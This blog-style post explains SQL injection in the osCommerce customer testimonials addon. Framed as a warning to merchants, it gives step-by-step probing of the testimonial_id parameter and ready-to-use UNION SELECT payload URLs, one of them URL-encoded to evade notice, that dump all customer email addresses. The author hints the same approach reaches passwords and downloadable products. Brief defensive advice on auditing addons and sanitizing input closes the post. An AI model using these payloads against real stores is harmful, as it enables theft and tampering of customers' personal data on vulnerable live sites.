Oscommerce Sql Injection

WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.

Ever wanted to check how an sql injection might work with an oscommerce store?

Firstly let’s introduce the terms for those interested:
Sql Injection happens when a developer accepts user input that is directly placed into a SQL Statement and doesn’t properly filter out dangerous characters. This can allow an attacker to not only steal data from your database, but also modify and delete it.

Oscommerce is an open source shopping cart software.

Let’s dig in now: Oscommerce sql injection is not intended to be a tutorial but is intended to trigger an alarm for all the merchants that are installing oscommerce addons without checking the code first.

Let’s take a small example of what happens when installing osc addons developed by newbies without checking the code first.

Ever heard of customer testimonial addon? It’s an oscommerce addon that enables merchant to accept customer testimonials on their oscommerce cart. So? What’s wrong with it you might ask? Hmm… it’s prone to sql injection. So anyone can steal your customers personal data including email, address, phone, delete and/or update information from your database which includes orders, products, get access to all your downloadable products and so on.

With your consent let’s dive into some examples.
I’ve took the last 30 min or so and found no less than 20 ecommerce websites that can be exploited using this method (unfortunately I can’t post here the method I used to find them). Anyway this is a really serious security problem that affects hundreds of ecommerce retailers from all over the world.

1. Let’s assume that we found website.com
2. go to website.com/customer_testimonials.php?testimonial_id=98080′ and see if an sql error is triggered. If yes, move on.
3. unlike any other sql injection attacks, the attacker is in great advantage here as he is aware this is an oscommerce website so he knows the database structure very well.

If you want to find out a list of emails of every customer the merchant has all you need is to go to:
website.com/customer_testimonials.php?testimonial_id=98080 union select 1,2,3,customers_email_address from customers

or same thing but a little stealthy:

website.com/customer_testimonials.php?testimonial_id=%39%38%30%38%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%63%75%73%74%6f%6d%65%72%73%5f%65%6d%61%69%6c%5f%61%64%64%72%65%73%73%20%66%72%6f%6d%20%63%75%73%74%6f%6d%65%72%73%2f%2a

Someone can also try:
website.com/customer_testimonials.php?testimonial_id=98080 union select 1,2,3,GROUP_CONCAT(customers_email_address),4,5,6,7,8 from customers
resulting in a comma separated list of all the customer emails returned as a single row. Same thing can be made to find out passwords or to grant access to download-able products and so on.

Some little explanations:
Union combines the results of two or more queries into a single results set consisting of all the rows belonging to all queries in the union.
1,2,3 are simple tweaks in order to have same number of columns like the ones returned from testimonial table. If you haven’t, “The used SELECT statements have a different number of columns” error is triggered.

How to defend yourself against such attacks?
1. As much as possible check the code you are installing to your oscommerce shopping cart or hire a professional to install it for you. If you hire a real professional the code will be checked, tested and retested bugs fixed and so on. Even it might cost you at the beginning some money you won’t risk loosing your business at a later date.
2. modify the tep_db_error function not to display the mysql errors anymore when going to production.
3. develop your code having the security in mind – every variable should be sanitized.